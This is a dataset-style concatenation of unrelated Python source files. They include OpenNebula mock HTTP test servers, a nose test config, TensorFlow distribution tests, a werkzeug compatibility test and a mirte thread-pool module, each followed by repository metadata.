if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _compute_25(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_25.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _storage_5(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures.load('disk_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _storage_15(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures.load('disk_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _network_5(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures.load('network_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
def _network_15(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures.load('network_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.OK, body, {},
httplib.responses[httplib.OK])
class OpenNebula_2_0_MockHttp(MockHttp):
"""
Mock HTTP server for testing v2.0 through v3.2 of the OpenNebula.org
compute driver.
"""
fixtures = ComputeFileFixtures('opennebula_2_0')
def _compute(self, method, url, body, headers):
"""
Compute pool resources.
"""
if method == 'GET':
body = self.fixtures.load('compute_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('compute_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _storage(self, method, url, body, headers):
"""
Storage pool resources.
"""
if method == 'GET':
body = self.fixtures.load('storage_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('storage_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _network(self, method, url, body, headers):
"""
Network pool resources.
"""
if method == 'GET':
body = self.fixtures.load('network_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('network_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _compute_5(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _compute_15(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _compute_25(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_25.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _storage_5(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures.load('storage_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _storage_15(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures.load('storage_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _network_5(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures.load('network_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _network_15(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures.load('network_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
class OpenNebula_3_0_MockHttp(OpenNebula_2_0_MockHttp):
"""
Mock HTTP server for testing v3.0 of the OpenNebula.org compute driver.
"""
fixtures_3_0 = ComputeFileFixtures('opennebula_3_0')
def _network(self, method, url, body, headers):
"""
Network pool resources.
"""
if method == 'GET':
body = self.fixtures_3_0.load('network_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures.load('network_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _network_5(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures_3_0.load('network_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _network_15(self, method, url, body, headers):
"""
Network entry resource.
"""
if method == 'GET':
body = self.fixtures_3_0.load('network_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
class OpenNebula_3_2_MockHttp(OpenNebula_3_0_MockHttp):
"""
Mock HTTP server for testing v3.2 of the OpenNebula.org compute driver.
"""
fixtures_3_2 = ComputeFileFixtures('opennebula_3_2')
def _compute_5(self, method, url, body, headers):
"""
Compute entry resource.
"""
if method == 'GET':
body = self.fixtures.load('compute_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _instance_type(self, method, url, body, headers):
"""
Instance type pool.
"""
if method == 'GET':
body = self.fixtures_3_2.load('instance_type_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
class OpenNebula_3_6_MockHttp(OpenNebula_3_2_MockHttp):
"""
Mock HTTP server for testing v3.6 of the OpenNebula.org compute driver.
"""
fixtures_3_6 = ComputeFileFixtures('opennebula_3_6')
def _storage(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('storage_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'POST':
body = self.fixtures_3_6.load('storage_5.xml')
return (httplib.CREATED, body, {},
httplib.responses[httplib.CREATED])
def _compute_5(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures_3_6.load('compute_5.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _compute_5_action(self, method, url, body, headers):
body = self.fixtures_3_6.load('compute_5.xml')
if method == 'POST':
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'GET':
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _compute_15(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures_3_6.load('compute_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if method == 'PUT':
body = ""
return (httplib.ACCEPTED, body, {},
httplib.responses[httplib.ACCEPTED])
if method == 'DELETE':
body = ""
return (httplib.NO_CONTENT, body, {},
httplib.responses[httplib.NO_CONTENT])
def _storage_10(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures_3_6.load('disk_10.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _storage_15(self, method, url, body, headers):
"""
Storage entry resource.
"""
if method == 'GET':
body = self.fixtures_3_6.load('disk_15.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
class OpenNebula_3_8_MockHttp(OpenNebula_3_2_MockHttp):
"""
Mock HTTP server for testing v3.8 of the OpenNebula.org compute driver.
"""
fixtures_3_8 = ComputeFileFixtures('opennebula_3_8')
def _instance_type(self, method, url, body, headers):
"""
Instance type pool.
"""
if method == 'GET':
body = self.fixtures_3_8.load('instance_type_collection.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _instance_type_small(self, method, url, body, headers):
"""
Small instance type.
"""
if method == 'GET':
body = self.fixtures_3_8.load('instance_type_small.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _instance_type_medium(self, method, url, body, headers):
"""
Medium instance type pool.
"""
if method == 'GET':
body = self.fixtures_3_8.load('instance_type_medium.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _instance_type_large(self, method, url, body, headers):
"""
Large instance type pool.
"""
if method == 'GET':
body = self.fixtures_3_8.load('instance_type_large.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
if __name__ == '__main__':
sys.exit(unittest.main())
| apache-2.0 | -1,800,356,755,161,604,900 | 35.863315 | 78 | 0.580391 | false |
wangjun/xiaohuangji | tests/test_config.py | 7 | 2111 | #-*-coding:utf-8-*-
"""
Copyright (c) 2012 wgx731 <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
'Software'), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
""" Nose test config file
config sys path for testing
"""
import os
import glob
import sys
TEST_DIR = os.path.abspath(os.path.dirname(__file__))
MAIN_CODE_DIR = os.path.abspath(os.path.join(TEST_DIR, os.path.pardir))
PLUGINS_CODE_DIR = os.path.abspath(os.path.join(MAIN_CODE_DIR, "plugins"))
# Result refers to result returned by plugin
WRONG_KEY_WORD_ERROR = "Missing or wrong keyword should not have result."
WRONG_RESULT_ERROR = "Correct keyword should have result."
WRONG_RESULT_FORMAT_ERROR = "Result should have correct format."
class TestBase(object):
@classmethod
def clean_up(klass, path, wildcard):
os.chdir(path)
for rm_file in glob.glob(wildcard):
os.unlink(rm_file)
@classmethod
def setup_class(klass):
sys.stderr.write("\nRunning %s\n" % klass)
@classmethod
def teardown_class(klass):
klass.clean_up(TEST_DIR, "*.py?")
klass.clean_up(PLUGINS_CODE_DIR, "*.py?")
klass.clean_up(MAIN_CODE_DIR, "*.py?")
| mit | -9,189,972,180,593,177,000 | 33.048387 | 74 | 0.732354 | false |
ArtsiomCh/tensorflow | tensorflow/contrib/distributions/python/kernel_tests/transformed_distribution_test.py | 8 | 16622 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TransformedDistribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import stats
from tensorflow.contrib import distributions
from tensorflow.contrib import linalg
from tensorflow.contrib.distributions.python.ops import bijectors
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
bs = bijectors
ds = distributions
la = linalg
class TransformedDistributionTest(test.TestCase):
def _cls(self):
return ds.TransformedDistribution
def _make_unimplemented(self, name):
def _unimplemented(self, *args): # pylint: disable=unused-argument
raise NotImplementedError("{} not implemented".format(name))
return _unimplemented
def testTransformedDistribution(self):
g = ops.Graph()
with g.as_default():
mu = 3.0
sigma = 2.0
# Note: the Jacobian callable only works for this example; more generally
# you may or may not need a reduce_sum.
log_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=bs.Exp(event_ndims=0))
sp_dist = stats.lognorm(s=sigma, scale=np.exp(mu))
# sample
sample = log_normal.sample(100000, seed=235)
self.assertAllEqual([], log_normal.event_shape)
with self.test_session(graph=g):
self.assertAllEqual([], log_normal.event_shape_tensor().eval())
self.assertAllClose(
sp_dist.mean(), np.mean(sample.eval()), atol=0.0, rtol=0.05)
# pdf, log_pdf, cdf, etc...
# The mean of the lognormal is around 148.
test_vals = np.linspace(0.1, 1000., num=20).astype(np.float32)
for func in [[log_normal.log_prob, sp_dist.logpdf],
[log_normal.prob, sp_dist.pdf],
[log_normal.log_cdf, sp_dist.logcdf],
[log_normal.cdf, sp_dist.cdf],
[log_normal.survival_function, sp_dist.sf],
[log_normal.log_survival_function, sp_dist.logsf]]:
actual = func[0](test_vals)
expected = func[1](test_vals)
with self.test_session(graph=g):
self.assertAllClose(expected, actual.eval(), atol=0, rtol=0.01)
def testNonInjectiveTransformedDistribution(self):
g = ops.Graph()
with g.as_default():
mu = 1.
sigma = 2.0
abs_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=bs.AbsoluteValue(event_ndims=0))
sp_normal = stats.norm(mu, sigma)
# sample
sample = abs_normal.sample(100000, seed=235)
self.assertAllEqual([], abs_normal.event_shape)
with self.test_session(graph=g):
sample_ = sample.eval()
self.assertAllEqual([], abs_normal.event_shape_tensor().eval())
# Abs > 0, duh!
np.testing.assert_array_less(0, sample_)
# Let X ~ Normal(mu, sigma), Y := |X|, then
# P[Y < 0.77] = P[-0.77 < X < 0.77]
self.assertAllClose(
sp_normal.cdf(0.77) - sp_normal.cdf(-0.77),
(sample_ < 0.77).mean(), rtol=0.01)
# p_Y(y) = p_X(-y) + p_X(y),
self.assertAllClose(
sp_normal.pdf(1.13) + sp_normal.pdf(-1.13),
abs_normal.prob(1.13).eval())
# Log[p_Y(y)] = Log[p_X(-y) + p_X(y)]
self.assertAllClose(
np.log(sp_normal.pdf(2.13) + sp_normal.pdf(-2.13)),
abs_normal.log_prob(2.13).eval())
def testQuantile(self):
with self.test_session() as sess:
logit_normal = self._cls()(
distribution=ds.Normal(loc=0., scale=1.),
bijector=bs.Sigmoid(),
validate_args=True)
grid = [0., 0.25, 0.5, 0.75, 1.]
q = logit_normal.quantile(grid)
cdf = logit_normal.cdf(q)
cdf_ = sess.run(cdf)
self.assertAllClose(grid, cdf_, rtol=1e-6, atol=0.)
def testCachedSamples(self):
exp_forward_only = bs.Exp(event_ndims=0)
exp_forward_only._inverse = self._make_unimplemented(
"inverse")
exp_forward_only._inverse_event_shape_tensor = self._make_unimplemented(
"inverse_event_shape_tensor ")
exp_forward_only._inverse_event_shape = self._make_unimplemented(
"inverse_event_shape ")
exp_forward_only._inverse_log_det_jacobian = self._make_unimplemented(
"inverse_log_det_jacobian ")
with self.test_session() as sess:
mu = 3.0
sigma = 0.02
log_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=exp_forward_only)
sample = log_normal.sample([2, 3], seed=42)
sample_val, log_pdf_val = sess.run([sample, log_normal.log_prob(sample)])
expected_log_pdf = stats.lognorm.logpdf(
sample_val, s=sigma, scale=np.exp(mu))
self.assertAllClose(expected_log_pdf, log_pdf_val, rtol=1e-4, atol=0.)
def testCachedSamplesInvert(self):
exp_inverse_only = bs.Exp(event_ndims=0)
exp_inverse_only._forward = self._make_unimplemented(
"forward")
exp_inverse_only._forward_event_shape_tensor = self._make_unimplemented(
"forward_event_shape_tensor ")
exp_inverse_only._forward_event_shape = self._make_unimplemented(
"forward_event_shape ")
exp_inverse_only._forward_log_det_jacobian = self._make_unimplemented(
"forward_log_det_jacobian ")
log_forward_only = bs.Invert(exp_inverse_only)
with self.test_session() as sess:
# The log bijector isn't defined over the whole real line, so we make
# sigma sufficiently small so that the draws are positive.
mu = 2.
sigma = 1e-2
exp_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=log_forward_only)
sample = exp_normal.sample([2, 3], seed=42)
sample_val, log_pdf_val = sess.run([sample, exp_normal.log_prob(sample)])
expected_log_pdf = sample_val + stats.norm.logpdf(
np.exp(sample_val), loc=mu, scale=sigma)
self.assertAllClose(expected_log_pdf, log_pdf_val, atol=0.)
def testShapeChangingBijector(self):
with self.test_session():
softmax = bs.SoftmaxCentered()
standard_normal = ds.Normal(loc=0., scale=1.)
multi_logit_normal = self._cls()(
distribution=standard_normal,
bijector=softmax)
x = [[-np.log(3.), 0.],
[np.log(3), np.log(5)]]
y = softmax.forward(x).eval()
expected_log_pdf = (stats.norm(loc=0., scale=1.).logpdf(x) -
np.sum(np.log(y), axis=-1))
self.assertAllClose(expected_log_pdf,
multi_logit_normal.log_prob(y).eval())
self.assertAllClose(
[1, 2, 3, 2],
array_ops.shape(multi_logit_normal.sample([1, 2, 3])).eval())
self.assertAllEqual([2], multi_logit_normal.event_shape)
self.assertAllEqual([2], multi_logit_normal.event_shape_tensor().eval())
def testEntropy(self):
with self.test_session():
shift = np.array([[-1, 0, 1], [-1, -2, -3]], dtype=np.float32)
diag = np.array([[1, 2, 3], [2, 3, 2]], dtype=np.float32)
actual_mvn_entropy = np.concatenate([
[stats.multivariate_normal(shift[i], np.diag(diag[i]**2)).entropy()]
for i in range(len(diag))])
fake_mvn = self._cls()(
ds.MultivariateNormalDiag(
loc=array_ops.zeros_like(shift),
scale_diag=array_ops.ones_like(diag),
validate_args=True),
bs.AffineLinearOperator(
shift,
scale=la.LinearOperatorDiag(diag, is_non_singular=True),
validate_args=True),
validate_args=True)
self.assertAllClose(actual_mvn_entropy,
fake_mvn.entropy().eval())
def testScalarBatchScalarEventIdentityScale(self):
with self.test_session() as sess:
exp2 = self._cls()(
ds.Exponential(rate=0.25),
bijector=ds.bijectors.Affine(
scale_identity_multiplier=2.,
event_ndims=0))
log_prob = exp2.log_prob(1.)
log_prob_ = sess.run(log_prob)
base_log_prob = -0.5 * 0.25 + np.log(0.25)
ildj = np.log(2.)
self.assertAllClose(base_log_prob - ildj, log_prob_, rtol=1e-6, atol=0.)
class ScalarToMultiTest(test.TestCase):
def _cls(self):
return ds.TransformedDistribution
def setUp(self):
self._shift = np.array([-1, 0, 1], dtype=np.float32)
self._tril = np.array([[[1., 0, 0],
[2, 1, 0],
[3, 2, 1]],
[[2, 0, 0],
[3, 2, 0],
[4, 3, 2]]],
dtype=np.float32)
def _testMVN(self,
base_distribution_class,
base_distribution_kwargs,
batch_shape=(),
event_shape=(),
not_implemented_message=None):
with self.test_session() as sess:
# Overriding shapes must be compatible w/bijector; most bijectors are
# batch_shape agnostic and only care about event_ndims.
# In the case of `Affine`, if we got it wrong then it would fire an
# exception due to incompatible dimensions.
batch_shape_pl = array_ops.placeholder(
dtypes.int32, name="dynamic_batch_shape")
event_shape_pl = array_ops.placeholder(
dtypes.int32, name="dynamic_event_shape")
feed_dict = {batch_shape_pl: np.array(batch_shape, dtype=np.int32),
event_shape_pl: np.array(event_shape, dtype=np.int32)}
fake_mvn_dynamic = self._cls()(
distribution=base_distribution_class(validate_args=True,
**base_distribution_kwargs),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=batch_shape_pl,
event_shape=event_shape_pl,
validate_args=True)
fake_mvn_static = self._cls()(
distribution=base_distribution_class(validate_args=True,
**base_distribution_kwargs),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=batch_shape,
event_shape=event_shape,
validate_args=True)
actual_mean = np.tile(self._shift, [2, 1]) # Affine elided this tile.
actual_cov = np.matmul(self._tril, np.transpose(self._tril, [0, 2, 1]))
def actual_mvn_log_prob(x):
return np.concatenate([
[stats.multivariate_normal(
actual_mean[i], actual_cov[i]).logpdf(x[:, i, :])]
for i in range(len(actual_cov))]).T
actual_mvn_entropy = np.concatenate([
[stats.multivariate_normal(
actual_mean[i], actual_cov[i]).entropy()]
for i in range(len(actual_cov))])
self.assertAllEqual([3], fake_mvn_static.event_shape)
self.assertAllEqual([2], fake_mvn_static.batch_shape)
self.assertAllEqual(tensor_shape.TensorShape(None),
fake_mvn_dynamic.event_shape)
self.assertAllEqual(tensor_shape.TensorShape(None),
fake_mvn_dynamic.batch_shape)
x = fake_mvn_static.sample(5, seed=0).eval()
for unsupported_fn in (fake_mvn_static.log_cdf,
fake_mvn_static.cdf,
fake_mvn_static.survival_function,
fake_mvn_static.log_survival_function):
with self.assertRaisesRegexp(NotImplementedError,
not_implemented_message):
unsupported_fn(x)
num_samples = 5e3
for fake_mvn, feed_dict in ((fake_mvn_static, {}),
(fake_mvn_dynamic, feed_dict)):
# Ensure sample works by checking first, second moments.
y = fake_mvn.sample(int(num_samples), seed=0)
x = y[0:5, ...]
sample_mean = math_ops.reduce_mean(y, 0)
centered_y = array_ops.transpose(y - sample_mean, [1, 2, 0])
sample_cov = math_ops.matmul(
centered_y, centered_y, transpose_b=True) / num_samples
[
sample_mean_,
sample_cov_,
x_,
fake_event_shape_,
fake_batch_shape_,
fake_log_prob_,
fake_prob_,
fake_entropy_,
] = sess.run([
sample_mean,
sample_cov,
x,
fake_mvn.event_shape_tensor(),
fake_mvn.batch_shape_tensor(),
fake_mvn.log_prob(x),
fake_mvn.prob(x),
fake_mvn.entropy(),
], feed_dict=feed_dict)
self.assertAllClose(actual_mean, sample_mean_, atol=0.1, rtol=0.1)
self.assertAllClose(actual_cov, sample_cov_, atol=0., rtol=0.1)
# Ensure all other functions work as intended.
self.assertAllEqual([5, 2, 3], x_.shape)
self.assertAllEqual([3], fake_event_shape_)
self.assertAllEqual([2], fake_batch_shape_)
self.assertAllClose(actual_mvn_log_prob(x_), fake_log_prob_,
atol=0., rtol=1e-6)
self.assertAllClose(np.exp(actual_mvn_log_prob(x_)), fake_prob_,
atol=0., rtol=1e-5)
self.assertAllClose(actual_mvn_entropy, fake_entropy_,
atol=0., rtol=1e-6)
def testScalarBatchScalarEvent(self):
self._testMVN(
base_distribution_class=ds.Normal,
base_distribution_kwargs={"loc": 0., "scale": 1.},
batch_shape=[2],
event_shape=[3],
not_implemented_message="not implemented when overriding event_shape")
def testScalarBatchNonScalarEvent(self):
self._testMVN(
base_distribution_class=ds.MultivariateNormalDiag,
base_distribution_kwargs={"loc": [0., 0., 0.],
"scale_diag": [1., 1, 1]},
batch_shape=[2],
not_implemented_message="not implemented")
with self.test_session():
# Can't override event_shape for scalar batch, non-scalar event.
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
self._cls()(
distribution=ds.MultivariateNormalDiag(loc=[0.], scale_diag=[1.]),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=[2],
event_shape=[3],
validate_args=True)
def testNonScalarBatchScalarEvent(self):
self._testMVN(
base_distribution_class=ds.Normal,
base_distribution_kwargs={"loc": [0., 0], "scale": [1., 1]},
event_shape=[3],
not_implemented_message="not implemented when overriding event_shape")
with self.test_session():
# Can't override batch_shape for non-scalar batch, scalar event.
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
self._cls()(
distribution=ds.Normal(loc=[0.], scale=[1.]),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=[2],
event_shape=[3],
validate_args=True)
def testNonScalarBatchNonScalarEvent(self):
with self.test_session():
# Can't override event_shape and/or batch_shape for non_scalar batch,
# non-scalar event.
with self.assertRaisesRegexp(ValueError, "base distribution not scalar"):
self._cls()(
distribution=ds.MultivariateNormalDiag(loc=[[0.]],
scale_diag=[[1.]]),
bijector=bs.Affine(shift=self._shift, scale_tril=self._tril),
batch_shape=[2],
event_shape=[3],
validate_args=True)
if __name__ == "__main__":
test.main()
| apache-2.0 | -4,548,337,352,118,971,000 | 38.76555 | 80 | 0.588978 | false |
niieani/rethinkdb | test/rql_test/connections/http_support/werkzeug/testsuite/compat.py | 146 | 1117 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.compat
~~~~~~~~~~~~~~~~~~~~~~~~~
Ensure that old stuff does not break on update.
:copyright: (c) 2014 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import unittest
import warnings
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.wrappers import Response
from werkzeug.test import create_environ
class CompatTestCase(WerkzeugTestCase):
def test_old_imports(self):
from werkzeug.utils import Headers, MultiDict, CombinedMultiDict, \
Headers, EnvironHeaders
from werkzeug.http import Accept, MIMEAccept, CharsetAccept, \
LanguageAccept, ETags, HeaderSet, WWWAuthenticate, \
Authorization
def test_exposed_werkzeug_mod(self):
import werkzeug
for key in werkzeug.__all__:
# deprecated, skip it
if key in ('templates', 'Template'):
continue
getattr(werkzeug, key)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(CompatTestCase))
return suite
| agpl-3.0 | 3,007,329,730,292,758,000 | 26.925 | 75 | 0.649955 | false |
bwesterb/mirte | src/threadPool.py | 1 | 5025 | from mirte.core import Module
from six.moves import range
import logging
import threading
try:
import prctl
except ImportError:
prctl = None
class ThreadPool(Module):
class Worker(threading.Thread):
def __init__(self, pool, l):
self._name = None
threading.Thread.__init__(self)
self.l = l
self.pool = pool
def run(self):
self.l.debug("Hello")
self.name = '(pristine)'
self.pool.cond.acquire()
self.pool.actualFT += 1
while True:
if not self.pool.running:
break
if not self.pool.jobs:
self.pool.cond.wait()
continue
job, name = self.pool.jobs.pop()
self.name = name
self.pool.actualFT -= 1
self.pool.cond.release()
try:
ret = job()
except Exception:
self.l.exception("Uncaught exception")
ret = True
# delete job. Otherwise job will stay alive
# while we wait on self.pool.cond
del(job)
self.pool.cond.acquire()
self.name = '(free)'
self.pool.actualFT += 1
self.pool.expectedFT += 1
if not ret:
break
self.pool.actualFT -= 1
self.pool.expectedFT -= 1
self.pool.workers.remove(self)
self.pool.cond.release()
self.l.debug("Bye (%s)" % self.name)
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
if prctl:
if value:
prctl.set_name(value)
else:
prctl.set_name('(no name)')
def __init__(self, *args, **kwargs):
super(ThreadPool, self).__init__(*args, **kwargs)
self.running = True
self.jobs = list()
self.cond = threading.Condition()
self.mcond = threading.Condition()
self.actualFT = 0 # actual number of free threads
self.expectedFT = 0 # expected number of free threads
self.expectedT = 0 # expected number of threads
self.ncreated = 0 # total number of threads created
self.workers = set()
def _remove_worker(self):
self._queue(lambda: False, False)
self.expectedT -= 1
def _create_worker(self):
self.ncreated += 1
self.expectedFT += 1
self.expectedT += 1
n = self.ncreated
l = logging.LoggerAdapter(self.l, {'sid': n})
t = ThreadPool.Worker(self, l)
self.workers.add(t)
t.start()
def start(self):
self.main_thread = threading.Thread(target=self.run)
self.main_thread.start()
def run(self):
self.mcond.acquire()
while self.running:
self.cond.acquire()
gotoSleep = False
tc = max(self.minFree - self.expectedFT
+ len(self.jobs),
self.min - self.expectedT)
td = min(self.expectedFT - len(self.jobs)
- self.maxFree,
self.expectedT - self.min)
if tc > 0:
for i in range(tc):
self._create_worker()
elif td > 0:
for i in range(td):
self._remove_worker()
else:
gotoSleep = True
self.cond.release()
if gotoSleep:
self.mcond.wait()
self.l.info("Waking and joining all workers")
with self.cond:
self.cond.notifyAll()
workers = list(self.workers)
self.mcond.release()
for worker in workers:
while True:
worker.join(1)
if not worker.isAlive():
break
self.l.warn("Still waiting on %s" % worker)
self.l.info(" joined")
def stop(self):
self.running = False
with self.mcond:
self.mcond.notify()
def _queue(self, raw, name=None):
if self.actualFT == 0:
self.l.warn("No actual free threads, yet " +
"(increase threadPool.minFree)")
self.jobs.append((raw, name))
self.expectedFT -= 1
self.cond.notify()
self.mcond.notify()
def execute_named(self, function, name=None, *args, **kwargs):
def _entry():
function(*args, **kwargs)
return True
with self.mcond:
with self.cond:
self._queue(_entry, name)
def execute(self, function, *args, **kwargs):
self.execute_named(function, None, *args, **kwargs)
def join(self):
self.main_thread.join()
# vim: et:sta:bs=2:sw=4:
| agpl-3.0 | -2,098,936,524,364,315,100 | 29.640244 | 66 | 0.487363 | false |
ww9rivers/pysnmp | pysnmp/proto/errind.py | 4 | 5505 | #
